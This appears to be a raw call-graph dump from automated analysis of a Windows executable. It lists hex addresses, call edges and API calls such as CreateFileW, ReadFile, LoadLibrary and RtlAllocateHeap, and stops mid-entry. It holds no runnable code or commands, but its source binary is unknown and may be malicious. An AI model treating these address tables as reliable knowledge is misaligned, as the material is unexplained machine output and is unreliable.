RegisterWindowMessageW 95370->95371 95371->95317 95373 81981 95372->95373 95380 8195d 95372->95380 95453 90242 5 API calls __Init_thread_wait 95373->95453 95376 8198b 95376->95380 95454 901f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95376->95454 95377 88727 95381 8196e 95377->95381 95456 901f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95377->95456 95380->95381 95455 90242 5 API calls __Init_thread_wait 95380->95455 95381->95321 95383 b272d 95382->95383 95384 71abb 95382->95384 95457 e3209 23 API calls 95383->95457 95385 8fddb 22 API calls 95384->95385 95387 71ac3 95385->95387 95387->95323 95388 b2738 95392 8fde0 95389->95392 95390 9ea0c ___std_exception_copy 21 API calls 95390->95392 95391 8fdfa 95391->95330 95392->95390 95392->95391 95394 8fdfc 95392->95394 95458 94ead 7 API calls 2 library calls 95392->95458 95395 9066d 95394->95395 95459 932a4 RaiseException 95394->95459 95460 932a4 RaiseException 95395->95460 95398 9068a 95398->95330 95399->95332 95400->95334 95461 e092a 28 API calls 95400->95461 95402 7a961 22 API calls 95401->95402 95403 713fc 95402->95403 95404 7a961 22 API calls 95403->95404 95405 71404 95404->95405 95406 7a961 22 API calls 95405->95406 95407 713c6 95406->95407 95407->95339 95409 76b67 _wcslen 95408->95409 95410 b4ba1 95408->95410 95413 76ba2 95409->95413 95414 76b7d 95409->95414 95431 793b2 95410->95431 95412 b4baa 95412->95412 95416 8fddb 22 API calls 95413->95416 95420 76f34 22 API calls 95414->95420 95418 76bae 95416->95418 95417 76b85 __fread_nolock 95417->95344 95421 8fe0b 95418->95421 95420->95417 95424 8fddb 95421->95424 95423 8fdfa 95423->95417 95424->95423 95427 8fdfc 95424->95427 95435 9ea0c 95424->95435 95442 94ead 7 API calls 2 library calls 95424->95442 95426 9066d 95444 932a4 RaiseException 95426->95444 95427->95426 95443 932a4 RaiseException 95427->95443 95430 9068a 95430->95417 95432 793c0 95431->95432 95434 793c9 __fread_nolock 95431->95434 95432->95434 95447 7aec9 95432->95447 95434->95412 95440 a3820 CallUnexpected 95435->95440 95436 a385e 95446 9f2d9 20 API calls __dosmaperr 95436->95446 95438 a3849 RtlAllocateHeap 95439 a385c 95438->95439 95438->95440 95439->95424 95440->95436 95440->95438 95445 94ead 7 API calls 2 library calls 95440->95445 95442->95424 95443->95426 95444->95430 95445->95440 95446->95439 95448 7aedc 95447->95448 95449 7aed9 __fread_nolock 95447->95449 95450 8fddb 22 API calls 95448->95450 95449->95434 95451 7aee7 95450->95451 95452 8fe0b 22 API calls 95451->95452 95452->95449 95453->95376 95454->95380 95455->95377 95456->95381 95457->95388 95458->95392 95459->95395 95460->95398 95462 72de3 95463 72df0 __wsopen_s 95462->95463 95464 72e09 95463->95464 95466 b2c2b ___scrt_fastfail 95463->95466 95478 73aa2 95464->95478 95468 b2c47 GetOpenFileNameW 95466->95468 95470 b2c96 95468->95470 95471 76b57 22 API calls 95470->95471 95473 b2cab 95471->95473 95473->95473 95475 72e27 95506 744a8 95475->95506 95535 b1f50 95478->95535 95481 73ace 95483 76b57 22 API calls 95481->95483 95482 73ae9 95541 7a6c3 95482->95541 95485 73ada 95483->95485 95537 737a0 95485->95537 95488 72da5 95489 b1f50 __wsopen_s 95488->95489 95490 72db2 GetLongPathNameW 95489->95490 95491 76b57 22 API calls 95490->95491 95492 72dda 95491->95492 95493 73598 95492->95493 95494 7a961 22 API calls 95493->95494 95495 735aa 95494->95495 95496 73aa2 23 API calls 95495->95496 95497 735b5 95496->95497 95498 735c0 95497->95498 95503 b32eb 95497->95503 95547 7515f 95498->95547 95505 b330d 95503->95505 95559 8ce60 41 API calls 95503->95559 95504 735df 95504->95475 95560 74ecb 95506->95560 95509 b3833 95582 e2cf9 95509->95582 95511 74ecb 94 API calls 95512 744e1 95511->95512 95512->95509 95514 744e9 95512->95514 95513 b3848 95515 b3869 95513->95515 95516 b384c 95513->95516 95517 744f5 95514->95517 95518 b3854 95514->95518 95520 8fe0b 22 API calls 95515->95520 95623 74f39 95516->95623 95622 7940c 136 API calls 2 library calls 95517->95622 95629 dda5a 82 API calls 95518->95629 95532 b38ae 95520->95532 95523 72e31 95524 b3862 95524->95515 95525 74f39 68 API calls 95528 b3a5f 95525->95528 95528->95525 95633 d989b 82 API calls __wsopen_s 95528->95633 95531 79cb3 22 API calls 95531->95532 95532->95528 95532->95531 95608 7a4a1 95532->95608 95616 73ff7 95532->95616 95630 d967e 22 API calls __fread_nolock 95532->95630 95631 d95ad 42 API calls _wcslen 95532->95631 95632 e0b5a 22 API calls 95532->95632 95536 73aaf GetFullPathNameW 95535->95536 95536->95481 95536->95482 95538 737ae 95537->95538 95539 793b2 22 API calls 95538->95539 95540 72e12 95539->95540 95540->95488 95542 7a6dd 95541->95542 95546 7a6d0 95541->95546 95543 8fddb 22 API calls 95542->95543 95544 7a6e7 95543->95544 95545 8fe0b 22 API calls 95544->95545 95545->95546 95546->95485 95548 7516e 95547->95548 95552 7518f __fread_nolock 95547->95552 95550 8fe0b 22 API calls 95548->95550 95549 8fddb 22 API calls 95551 735cc 95549->95551 95550->95552 95553 735f3 95551->95553 95552->95549 95554 73605 95553->95554 95558 73624 __fread_nolock 95553->95558 95557 8fe0b 22 API calls 95554->95557 95555 8fddb 22 API calls 95556 7363b 95555->95556 95556->95504 95557->95558 95558->95555 95559->95503 95634 74e90 LoadLibraryA 95560->95634 95565 74ef6 LoadLibraryExW 95642 74e59 LoadLibraryA 95565->95642 95566 b3ccf 95568 74f39 68 API calls 95566->95568 95570 b3cd6 95568->95570 95571 74e59 3 API calls 95570->95571 95573 b3cde 95571->95573 95664 750f5 95573->95664 95574 74f20 95574->95573 95575 74f2c 95574->95575 95577 74f39 68 API calls 95575->95577 95579 744cd 95577->95579 95579->95509 95579->95511 95581 b3d05 95583 e2d15 95582->95583 95584 7511f 64 API calls 95583->95584 95585 e2d29 95584->95585 95935 e2e66 95585->95935 95588 e2d3f 95588->95513 95589 750f5 40 API calls 95590 e2d56 95589->95590 95591 750f5 40 API calls 95590->95591 95592 e2d66 95591->95592 95593 750f5 40 API calls 95592->95593 95594 e2d81 95593->95594 95595 750f5 40 API calls 95594->95595 95596 e2d9c 95595->95596 95597 7511f 64 API calls 95596->95597 95598 e2db3 95597->95598 95599 9ea0c ___std_exception_copy 21 API calls 95598->95599 95600 e2dba 95599->95600 95601 9ea0c ___std_exception_copy 21 API calls 95600->95601 95602 e2dc4 95601->95602 95603 750f5 40 API calls 95602->95603 95604 e2dd8 95603->95604 95605 e28fe 27 API calls 95604->95605 95606 e2dee 95605->95606 95606->95588 95941 e22ce 95606->95941 95609 7a4b1 __fread_nolock 95608->95609 95610 7a52b 95608->95610 95611 8fddb 22 API calls 95609->95611 95613 8fe0b 22 API calls 95610->95613 95612 7a4b8 95611->95612 95614 8fddb 22 API calls 95612->95614 95615 7a4d6 95612->95615 95613->95609 95614->95615 95615->95532 95617 7400a 95616->95617 95619 740ae 95616->95619 95618 8fe0b 22 API calls 95617->95618 95621 7403c 95617->95621 95618->95621 95619->95532 95620 8fddb 22 API calls 95620->95621 95621->95619 95621->95620 95622->95523 95624 74f43 95623->95624 95628 74f4a 95623->95628 95625 9e678 67 API calls 95624->95625 95625->95628 95626 74f6a FreeLibrary 95627 74f59 95626->95627 95627->95518 95628->95626 95628->95627 95629->95524 95630->95532 95631->95532 95632->95532 95633->95528 95635 74ec6 95634->95635 95636 74ea8 GetProcAddress 95634->95636 95639 9e5eb 95635->95639 95637 74eb8 95636->95637 95637->95635 95638 74ebf FreeLibrary 95637->95638 95638->95635 95672 9e52a 95639->95672 95641 74eea 95641->95565 95641->95566 95643 74e6e GetProcAddress 95642->95643 95644 74e8d 95642->95644 95645 74e7e 95643->95645 95647 74f80 95644->95647 95645->95644 95646 74e86 FreeLibrary 95645->95646 95646->95644 95648 8fe0b 22 API calls 95647->95648 95649 74f95 95648->95649 95740 75722 95649->95740 95651 74fa1 __fread_nolock 95652 750a5 95651->95652 95653 b3d1d 95651->95653 95663 74fdc 95651->95663 95743 742a2 CreateStreamOnHGlobal 95652->95743 95754 e304d 74 API calls 95653->95754 95656 b3d22 95658 7511f 64 API calls 95656->95658 95657 750f5 40 API calls 95657->95663 95659 b3d45 95658->95659 95660 750f5 40 API calls 95659->95660 95661 7506e messages 95660->95661 95661->95574 95663->95656 95663->95657 95663->95661 95749 7511f 95663->95749 95665 75107 95664->95665 95666 b3d70 95664->95666 95776 9e8c4 95665->95776 95669 e28fe 95918 e274e 95669->95918 95671 e2919 95671->95581 95675 9e536 ___DestructExceptionObject 95672->95675 95673 9e544 95697 9f2d9 20 API calls __dosmaperr 95673->95697 95675->95673 95676 9e574 95675->95676 95678 9e579 95676->95678 95679 9e586 95676->95679 95677 9e549 95698 a27ec 26 API calls pre_c_initialization 95677->95698 95699 9f2d9 20 API calls __dosmaperr 95678->95699 95689 a8061 95679->95689 95683 9e58f 95684 9e5a2 95683->95684 95685 9e595 95683->95685 95701 9e5d4 LeaveCriticalSection __fread_nolock 95684->95701 95700 9f2d9 20 API calls __dosmaperr 95685->95700 95686 9e554 __fread_nolock 95686->95641 95690 a806d ___DestructExceptionObject 95689->95690 95702 a2f5e EnterCriticalSection 95690->95702 95692 a807b 95703 a80fb 95692->95703 95696 a80ac __fread_nolock 95696->95683 95697->95677 95698->95686 95699->95686 95700->95686 95701->95686 95702->95692 95704 a811e 95703->95704 95705 a8177 95704->95705 95712 a8088 95704->95712 95719 9918d EnterCriticalSection 95704->95719 95720 991a1 LeaveCriticalSection 95704->95720 95721 a4c7d 95705->95721 95710 a8189 95710->95712 95734 a3405 11 API calls 2 library calls 95710->95734 95716 a80b7 95712->95716 95713 a81a8 95735 9918d EnterCriticalSection 95713->95735 95739 a2fa6 LeaveCriticalSection 95716->95739 95718 a80be 95718->95696 95719->95704 95720->95704 95726 a4c8a CallUnexpected 95721->95726 95722 a4cca 95737 9f2d9 20 API calls __dosmaperr 95722->95737 95723 a4cb5 RtlAllocateHeap 95724 a4cc8 95723->95724 95723->95726 95728 a29c8 95724->95728 95726->95722 95726->95723 95736 94ead 7 API calls 2 library calls 95726->95736 95729 a29d3 RtlFreeHeap 95728->95729 95733 a29fc _free 95728->95733 95730 a29e8 95729->95730 95729->95733 95738 9f2d9 20 API calls __dosmaperr 95730->95738 95732 a29ee GetLastError 95732->95733 95733->95710 95734->95713 95735->95712 95736->95726 95737->95724 95738->95732 95739->95718 95741 8fddb 22 API calls 95740->95741 95742 75734 95741->95742 95742->95651 95744 742bc FindResourceExW 95743->95744 95745 742d9 95743->95745 95744->95745 95746 b35ba LoadResource 95744->95746 95745->95663 95746->95745 95747 b35cf SizeofResource 95746->95747 95747->95745 95748 b35e3 LockResource 95747->95748 95748->95745 95750 7512e 95749->95750 95751 b3d90 95749->95751 95755 9ece3 95750->95755 95754->95656 95758 9eaaa 95755->95758 95757 7513c 95757->95663 95761 9eab6 ___DestructExceptionObject 95758->95761 95759 9eac2 95771 9f2d9 20 API calls __dosmaperr 95759->95771 95760 9eae8 95773 9918d EnterCriticalSection 95760->95773 95761->95759 95761->95760 95764 9eac7 95772 a27ec 26 API calls pre_c_initialization 95764->95772 95766 9eaf4 95774 9ec0a 62 API calls 2 library calls 95766->95774 95768 9eb08 95775 9eb27 LeaveCriticalSection __fread_nolock 95768->95775 95770 9ead2 __fread_nolock 95770->95757 95771->95764 95772->95770 95773->95766 95774->95768 95775->95770 95779 9e8e1 95776->95779 95778 75118 95778->95669 95780 9e8ed ___DestructExceptionObject 95779->95780 95781 9e92d 95780->95781 95782 9e900 ___scrt_fastfail 95780->95782 95783 9e925 __fread_nolock 95780->95783 95792 9918d EnterCriticalSection 95781->95792 95806 9f2d9 20 API calls __dosmaperr 95782->95806 95783->95778 95786 9e937 95793 9e6f8 95786->95793 95787 9e91a 95807 a27ec 26 API calls pre_c_initialization 95787->95807 95792->95786 95797 9e70a ___scrt_fastfail 95793->95797 95799 9e727 95793->95799 95794 9e717 95881 9f2d9 20 API calls __dosmaperr 95794->95881 95796 9e71c 95882 a27ec 26 API calls pre_c_initialization 95796->95882 95797->95794 95797->95799 95801 9e76a __fread_nolock 95797->95801 95808 9e96c LeaveCriticalSection __fread_nolock 95799->95808 95800 9e886 ___scrt_fastfail 95884 9f2d9 20 API calls __dosmaperr 95800->95884 95801->95799 95801->95800 95809 9d955 95801->95809 95816 a8d45 95801->95816 95883 9cf78 26 API calls 4 library calls 95801->95883 95806->95787 95807->95783 95808->95783 95810 9d961 95809->95810 95811 9d976 95809->95811 95885 9f2d9 20 API calls __dosmaperr 95810->95885 95811->95801 95813 9d966 95886 a27ec 26 API calls pre_c_initialization 95813->95886 95815 9d971 95815->95801 95817 a8d6f 95816->95817 95818 a8d57 95816->95818 95820 a90d9 95817->95820 95825 a8db4 95817->95825 95896 9f2c6 20 API calls __dosmaperr 95818->95896 95912 9f2c6 20 API calls __dosmaperr 95820->95912 95821 a8d5c 95897 9f2d9 20 API calls __dosmaperr 95821->95897 95824 a90de 95913 9f2d9 20 API calls __dosmaperr 95824->95913 95826 a8d64 95825->95826 95828 a8dbf 95825->95828 95832 a8def 95825->95832 95826->95801 95898 9f2c6 20 API calls __dosmaperr 95828->95898 95829 a8dcc 95914 a27ec 26 API calls pre_c_initialization 95829->95914 95831 a8dc4 95899 9f2d9 20 API calls __dosmaperr 95831->95899 95835 a8e08 95832->95835 95836 a8e4a 95832->95836 95837 a8e2e 95832->95837 95835->95837 95871 a8e15 95835->95871 95903 a3820 21 API calls 2 library calls 95836->95903 95900 9f2c6 20 API calls __dosmaperr 95837->95900 95840 a8e33 95901 9f2d9 20 API calls __dosmaperr 95840->95901 95841 a8e61 95844 a29c8 _free 20 API calls 95841->95844 95847 a8e6a 95844->95847 95845 a8fb3 95848 a9029 95845->95848 95852 a8fcc GetConsoleMode 95845->95852 95846 a8e3a 95902 a27ec 26 API calls pre_c_initialization 95846->95902 95850 a29c8 _free 20 API calls 95847->95850 95851 a902d ReadFile 95848->95851 95853 a8e71 95850->95853 95854 a90a1 GetLastError 95851->95854 95855 a9047 95851->95855 95852->95848 95856 a8fdd 95852->95856 95857 a8e7b 95853->95857 95858 a8e96 95853->95858 95859 a90ae 95854->95859 95860 a9005 95854->95860 95855->95854 95861 a901e 95855->95861 95856->95851 95862 a8fe3 ReadConsoleW 95856->95862 95904 9f2d9 20 API calls __dosmaperr 95857->95904 95906 a9424 28 API calls __wsopen_s 95858->95906 95910 9f2d9 20 API calls __dosmaperr 95859->95910 95878 a8e45 __fread_nolock 95860->95878 95907 9f2a3 20 API calls 2 library calls 95860->95907 95874 a906c 95861->95874 95875 a9083 95861->95875 95861->95878 95862->95861 95863 a8fff GetLastError 95862->95863 95863->95860 95864 a29c8 _free 20 API calls 95864->95826 95869 a8e80 95905 9f2c6 20 API calls __dosmaperr 95869->95905 95870 a90b3 95911 9f2c6 20 API calls __dosmaperr 95870->95911 95887 af89b 95871->95887 95908 a8a61 31 API calls 4 library calls 95874->95908 95877 a909a 95875->95877 95875->95878 95909 a88a1 29 API calls __wsopen_s 95877->95909 95878->95864 95880 a909f 95880->95878 95881->95796 95882->95799 95883->95801 95884->95796 95885->95813 95886->95815 95888 af8a8 95887->95888 95889 af8b5 95887->95889 95915 9f2d9 20 API calls __dosmaperr 95888->95915 95892 af8c1 95889->95892 95916 9f2d9 20 API calls __dosmaperr 95889->95916 95891 af8ad 95891->95845 95892->95845 95894 af8e2 95917 a27ec 26 API calls pre_c_initialization 95894->95917 95896->95821 95897->95826 95898->95831 95899->95829 95900->95840 95901->95846 95902->95878 95903->95841 95904->95869 95905->95878 95906->95871 95907->95878 95908->95878 95909->95880 95910->95870 95911->95878 95912->95824 95913->95829 95914->95826 95915->95891 95916->95894 95917->95891 95921 9e4e8 95918->95921 95920 e275d 95920->95671 95924 9e469 95921->95924 95923 9e505 95923->95920 95925 9e478 95924->95925 95926 9e48c 95924->95926 95932 9f2d9 20 API calls __dosmaperr 95925->95932 95930 9e488 __alldvrm 95926->95930 95934 a333f 11 API calls 2 library calls 95926->95934 95929 9e47d 95933 a27ec 26 API calls pre_c_initialization 95929->95933 95930->95923 95932->95929 95933->95930 95934->95930 95939 e2e7a 95935->95939 95936 e2d3b 95936->95588 95936->95589 95937 750f5 40 API calls 95937->95939 95938 e28fe 27 API calls 95938->95939 95939->95936 95939->95937 95939->95938 95940 7511f 64 API calls 95939->95940 95940->95939 95942 e22e7 95941->95942 95943 e22d9 95941->95943 95945 e232c 95942->95945 95946 9e5eb 29 API calls 95942->95946 95958 e22f0 95942->95958 95944 9e5eb 29 API calls 95943->95944 95944->95942 95970 e2557 95945->95970 95948 e2311 95946->95948 95948->95945 95950 e231a 95948->95950 95949 e2370 95951 e2374 95949->95951 95952 e2395 95949->95952 95954 9e678 67 API calls 95950->95954 95950->95958 95953 e2381 95951->95953 95957 9e678 67 API calls 95951->95957 95974 e2171 95952->95974 95953->95958 95961 9e678 67 API calls 95953->95961 95954->95958 95956 e239d 95959 e23c3 95956->95959 95960 e23a3 95956->95960 95957->95953 95958->95588 95981 e23f3 95959->95981 95963 9e678 67 API calls 95960->95963 95964 e23b0 95960->95964 95961->95958 95963->95964 95964->95958 95965 9e678 67 API calls 95964->95965 95965->95958 95966 e23de 95966->95958 95969 9e678 67 API calls 95966->95969 95967 e23ca 95967->95966 95989 9e678 95967->95989 95969->95958 95971 e257c 95970->95971 95973 e2565 __fread_nolock 95970->95973 95972 9e8c4 __fread_nolock 40 API calls 95971->95972 95972->95973 95973->95949 95975 9ea0c ___std_exception_copy 21 API calls 95974->95975 95976 e217f 95975->95976 95977 9ea0c ___std_exception_copy 21 API calls 95976->95977 95978 e2190 95977->95978 95979 9ea0c ___std_exception_copy 21 API calls 95978->95979 95980 e219c 95979->95980 95980->95956 95985 e2408 95981->95985 95982 e24c0 96006 e2724 95982->96006 95984 e21cc 40 API calls 95984->95985 95985->95982 95985->95984 95988 e24c7 95985->95988 96002 e2606 95985->96002 96010 e2269 40 API calls 95985->96010 95988->95967 95990 9e684 ___DestructExceptionObject 95989->95990 95991 9e6aa 95990->95991 95992 9e695 95990->95992 96001 9e6a5 __fread_nolock 95991->96001 96046 9918d EnterCriticalSection 95991->96046 96063 9f2d9 20 API calls __dosmaperr 95992->96063 95994 9e69a 96064 a27ec 26 API calls pre_c_initialization 95994->96064 95997 9e6c6 96047 9e602 95997->96047 95999 9e6d1 96065 9e6ee LeaveCriticalSection __fread_nolock 95999->96065 96001->95966 96003 e2617 96002->96003 96004 e261d 96002->96004 96003->96004 96011 e26d7 96003->96011 96004->95985 96007 e2742 96006->96007 96008 e2731 96006->96008 96007->95988 96009 9dbb3 65 API calls 96008->96009 96009->96007 96010->95985 96012 e2714 96011->96012 96013 e2703 96011->96013 96012->96003 96015 9dbb3 96013->96015 96016 9dbc1 96015->96016 96021 9dbdd 96015->96021 96017 9dbcd 96016->96017 96018 9dbe3 96016->96018 96016->96021 96027 9f2d9 20 API calls __dosmaperr 96017->96027 96024 9d9cc 96018->96024 96021->96012 96022 9dbd2 96028 a27ec 26 API calls pre_c_initialization 96022->96028 96029 9d97b 96024->96029 96027->96022 96028->96021 96030 9d987 ___DestructExceptionObject 96029->96030 96037 9918d EnterCriticalSection 96030->96037 96032 9d995 96038 9d9f4 96032->96038 96036 9d9b3 __fread_nolock 96037->96032 96039 a49a1 27 API calls 96038->96039 96040 9da09 96039->96040 96041 9da3a 62 API calls 96040->96041 96042 9da24 96041->96042 96043 a4a56 62 API calls 96042->96043 96044 9d9a2 96043->96044 96045 9d9c0 LeaveCriticalSection __fread_nolock 96044->96045 96045->96036 96046->95997 96048 9e60f 96047->96048 96049 9e624 96047->96049 96091 9f2d9 20 API calls __dosmaperr 96048->96091 96054 9e61f 96049->96054 96066 9dc0b 96049->96066 96051 9e614 96092 a27ec 26 API calls pre_c_initialization 96051->96092 96054->95999 96058 9d955 __fread_nolock 26 API calls 96059 9e646 96058->96059 96076 a862f 96059->96076 96063->95994 96064->96001 96065->96001 96067 9dc1f 96066->96067 96068 9dc23 96066->96068 96072 a4d7a 96067->96072 96068->96067 96069 9d955 __fread_nolock 26 API calls 96068->96069 96070 9dc43 96069->96070 96093 a59be 96070->96093 96073 a4d90 96072->96073 96074 9e640 96072->96074 96073->96074 96075 a29c8 _free 20 API calls 96073->96075 96074->96058 96075->96074 96077 a863e 96076->96077 96078 a8653 96076->96078 96216 9f2c6 20 API calls __dosmaperr 96077->96216 96080 a868e 96078->96080 96084 a867a 96078->96084 96218 9f2c6 20 API calls __dosmaperr 96080->96218 96081 a8643 96217 9f2d9 20 API calls __dosmaperr 96081->96217 96213 a8607 96084->96213 96085 a8693 96219 9f2d9 20 API calls __dosmaperr 96085->96219 96089 9e64c 96089->96054 96091->96051 96092->96054 96094 a59ca ___DestructExceptionObject 96093->96094 96095 a59ea 96094->96095 96096 a59d2 96094->96096 96098 a5a88 96095->96098 96103 a5a1f 96095->96103 96172 9f2c6 20 API calls __dosmaperr 96096->96172 96177 9f2c6 20 API calls __dosmaperr 96098->96177 96099 a59d7 96173 9f2d9 20 API calls __dosmaperr 96099->96173 96102 a5a8d 96178 9f2d9 20 API calls __dosmaperr 96102->96178 96118 a5147 EnterCriticalSection 96103->96118 96106 a5a95 96107 a5a25 96109 a5a41 96107->96109 96110 a5a56 96107->96110 96174 9f2d9 20 API calls __dosmaperr 96109->96174 96119 a5aa9 96110->96119 96111 a59df __fread_nolock 96111->96067 96118->96107 96172->96099 96173->96111 96177->96102 96178->96106 96221 a8585 96213->96221 96216->96081 96217->96089 96218->96085 96222 a8591 ___DestructExceptionObject 96221->96222 96265 a8402 96270 a81be 96265->96270 96268 a842a 96275 a81ef try_get_first_available_module 96270->96275 96272 a83ee 96289 a27ec 26 API calls pre_c_initialization 96272->96289 96274 a8343 96274->96268 96282 b0984 96274->96282 96278 a8338 96275->96278 96285 98e0b 40 API calls 2 library calls 96275->96285 96277 a838c 96277->96278 96286 98e0b 40 API calls 2 library calls 96277->96286 96278->96274 96288 9f2d9 20 API calls __dosmaperr 96278->96288 96280 a83ab 96280->96278 96287 98e0b 40 API calls 2 library calls 96280->96287 96290 b0081 96282->96290 96284 b099f 96284->96268 96285->96277 96286->96280 96287->96278 96288->96272 96289->96274 96291 b008d ___DestructExceptionObject 96290->96291 96292 b009b 96291->96292 96295 b00d4 96291->96295 96347 9f2d9 20 API calls __dosmaperr 96292->96347 96294 b00a0 96348 a27ec 26 API calls pre_c_initialization 96294->96348 96301 b065b 96295->96301 96300 b00aa __fread_nolock 96300->96284 96302 b0678 96301->96302 96303 b068d 96302->96303 96304 b06a6 96302->96304 96364 9f2c6 20 API calls __dosmaperr 96303->96364 96350 a5221 96304->96350 96307 b0692 96365 9f2d9 20 API calls __dosmaperr 96307->96365 96308 b06ab 96309 b06cb 96308->96309 96310 b06b4 96308->96310 96363 b039a CreateFileW 96309->96363 96366 9f2c6 20 API calls __dosmaperr 96310->96366 96314 b06b9 96367 9f2d9 20 API calls __dosmaperr 96314->96367 96316 b0781 GetFileType 96318 b078c GetLastError 96316->96318 96319 b07d3 96316->96319 96317 b0756 GetLastError 96369 9f2a3 20 API calls 2 library calls 96317->96369 96370 9f2a3 20 API calls 2 library calls 96318->96370 96372 a516a 21 API calls 3 library calls 96319->96372 96320 b0704 96320->96316 96320->96317 96368 b039a CreateFileW 96320->96368 96323 b079a CloseHandle 96323->96307 96325 b07c3 96323->96325 96371 9f2d9 20 API calls __dosmaperr 96325->96371 96327 b0749 96327->96316 96327->96317 96329 b07f4 96331 b0840 96329->96331 96373 b05ab 72 API calls 4 library calls 96329->96373 96330 b07c8 96330->96307 96335 b086d 96331->96335 96374 b014d 72 API calls 4 library calls 96331->96374 96334 b0866 96334->96335 96337 b087e 96334->96337 96336 a86ae __wsopen_s 29 API calls 96335->96336 96338 b00f8 96336->96338 96337->96338 96339 b08fc CloseHandle 96337->96339 96349 b0121 LeaveCriticalSection __wsopen_s 96338->96349 96375 b039a CreateFileW 96339->96375 96341 b0927 96342 b095d 96341->96342 96343 b0931 GetLastError 96341->96343 96342->96338 96376 9f2a3 20 API calls 2 library calls 96343->96376 96345 b093d 96377 a5333 21 API calls 3 library calls 96345->96377 96347->96294 96348->96300 96349->96300 96351 a522d ___DestructExceptionObject 96350->96351 96378 a2f5e EnterCriticalSection 96351->96378 96353 a5234 96354 a5259 96353->96354 96357 a52c7 EnterCriticalSection 96353->96357 96361 a527b 96353->96361 96382 a5000 96354->96382 96360 a52d4 LeaveCriticalSection 96357->96360 96357->96361 96359 a52a4 __fread_nolock 96359->96308 96360->96353 96379 a532a 96361->96379 96363->96320 96364->96307 96365->96338 96366->96314 96367->96307 96368->96327 96369->96307 96370->96323 96371->96330 96372->96329 96373->96331 96374->96334 96375->96341 96376->96345 96377->96342 96378->96353 96390 a2fa6 LeaveCriticalSection 96379->96390 96381 a5331 96381->96359 96383 a4c7d CallUnexpected 20 API calls 96382->96383 96385 a5012 96383->96385 96384 a501f 96386 a29c8 _free 20 API calls 96384->96386 96385->96384 96391 a3405 11 API calls 2 library calls 96385->96391 96387 a5071 96386->96387 96387->96361 96389 a5147 EnterCriticalSection 96387->96389 96389->96361 96390->96381 96391->96385 96392 13923b0 96406 1390000 96392->96406 96394 139249f 96409 13922a0 96394->96409 96412 13934d0 GetPEB 96406->96412 96408 139068b 96408->96394 96410 13922a9 Sleep 96409->96410 96411 13922b7 96410->96411 96413 13934fa 96412->96413 96413->96408 96414 71cad SystemParametersInfoW 96415 7ddac 96418 7caf0 96415->96418 96417 7ddb7 96419 7cb69 96418->96419 96503 7cf89 96418->96503 96420 7cf73 96419->96420 96421 7cb8c 96419->96421 96541 8d336 40 API calls 96420->96541 96421->96503 96504 7bbe0 96421->96504 96425 c0ee7 96425->96425 96426 7cba7 96427 7cf10 96426->96427 96428 7cbf6 96426->96428 96437 c0abf 96426->96437 96438 7cd88 96426->96438 96426->96503 96540 7a81b 41 API calls 96427->96540 96429 7cc07 96428->96429 96430 c0b1a 96428->96430 96433 7ec40 235 API calls 96429->96433 96436 7ec40 235 API calls 96430->96436 96430->96503 96449 7cc1e 96433->96449 96439 c0b41 96436->96439 96437->96430 96485 7ce8b 96437->96485 96542 f79b6 235 API calls 96437->96542 96543 8a308 235 API calls 96437->96543 96537 7b567 39 API calls 96438->96537 96441 c0b51 96439->96441 96443 c0bbe 96439->96443 96464 c0b63 96439->96464 96439->96485 96440 7cde8 96451 c0daa 96440->96451 96452 7cdfe 96440->96452 96458 c0e4c 96440->96458 96440->96485 96557 7aceb 23 API calls messages 96441->96557 96442 7cc3a 96442->96503 96512 7ec40 96442->96512 96445 c0c0d 96443->96445 96447 c0bfb 96443->96447 96555 db59b 22 API calls 96443->96555 96559 f47d4 235 API calls 96445->96559 96558 79c6e 22 API calls 96447->96558 96448 c0e4a 96576 7289a 23 API calls 96448->96576 96449->96442 96449->96485 96449->96503 96560 7a8c7 96449->96560 96570 f4523 239 API calls ___scrt_fastfail 96451->96570 96452->96448 96452->96458 96538 7b649 54 API calls 96452->96538 96574 f5705 23 API calls 96458->96574 96459 c0bb9 96556 7aceb 23 API calls messages 96459->96556 96461 7ce43 96461->96458 96465 c0e77 96461->96465 96539 7b649 54 API calls 96461->96539 96462 c0de7 96468 c0e35 96462->96468 96469 c0df5 96462->96469 96464->96447 96544 804f0 96464->96544 96575 7b649 54 API calls 96465->96575 96572 7aceb 23 API calls messages 96468->96572 96571 79c6e 22 API calls 96469->96571 96470 7cc82 96478 7ec40 235 API calls 96470->96478 96470->96485 96486 7ccb2 96470->96486 96471 c0ba8 96471->96447 96477 804f0 22 API calls 96471->96477 96474 7ce5f 96474->96448 96474->96458 96482 7ce84 96474->96482 96477->96459 96480 c0cc3 96478->96480 96479 c0e3e 96573 7aceb 23 API calls messages 96479->96573 96480->96485 96564 7aceb 23 API calls messages 96480->96564 96483 8fddb 22 API calls 96482->96483 96483->96485 96485->96417 96489 c0d06 96486->96489 96492 7ccf2 96486->96492 96487 c0d23 96567 8ad9c 39 API calls 96487->96567 96488 c0d19 96566 7b415 39 API calls 96488->96566 96489->96488 96565 8ad9c 39 API calls 96489->96565 96492->96427 96492->96487 96494 7cd2e 96492->96494 96492->96503 96494->96487 96495 7cd45 96494->96495 96497 7cd4a 96494->96497 96536 7b415 39 API calls 96495->96536 96498 7cd74 96497->96498 96500 c0d66 96497->96500 96498->96438 96498->96503 96499 c0d7a 96569 7b415 39 API calls 96499->96569 96500->96499 96568 8ad9c 39 API calls 96500->96568 96577 e359c 82 API calls __wsopen_s 96503->96577 96505 7be27 96504->96505 96510 7bbf3 96504->96510 96505->96426 96507 7a961 22 API calls 96507->96510 96508 7bc9d 96508->96426 96510->96507 96510->96508 96578 90242 5 API calls __Init_thread_wait 96510->96578 96579 900a3 29 API calls __onexit 96510->96579 96580 901f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96510->96580 96519 7ec76 messages 96512->96519 96513 90242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96513->96519 96514 901f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96514->96519 96515 c4beb 96586 e359c 82 API calls __wsopen_s 96515->96586 96516 8fddb 22 API calls 96516->96519 96518 7fef7 96525 7a8c7 22 API calls 96518->96525 96529 7ed9d messages 96518->96529 96519->96513 96519->96514 96519->96515 96519->96516 96519->96518 96521 c4b0b 96519->96521 96522 c4600 96519->96522 96526 7a8c7 22 API calls 96519->96526 96519->96529 96530 7a961 22 API calls 96519->96530 96531 7fbe3 96519->96531 96532 900a3 29 API calls pre_c_initialization 96519->96532 96535 7f3ae messages 96519->96535 96581 801e0 235 